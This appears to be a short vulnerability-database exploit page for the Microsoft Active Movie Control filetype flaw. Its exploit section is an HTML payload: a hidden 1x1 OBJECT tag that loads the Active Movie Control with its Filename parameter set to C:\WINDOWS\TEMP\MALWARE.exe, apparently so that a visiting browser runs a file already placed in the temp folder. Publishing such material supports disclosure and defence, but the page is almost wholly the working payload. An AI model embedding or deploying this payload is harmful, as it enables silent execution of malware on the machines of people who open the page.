Microsoft Active Movie Control Filetype Vulnerability

info
discussion
exploit
solution
references

Microsoft Active Movie Control Filetype Vulnerability

The following script assumes a default Windows Temp folder of c:\windows\temp

<OBJECT classid=clsid:05589FA1-C356-11CE-BF01-00AA0055595A height=1
style="DISPLAY: none" width=1>
<PARAM NAME="Filename" VALUE="C:\WINDOWS\TEMP\MALWARE.exe">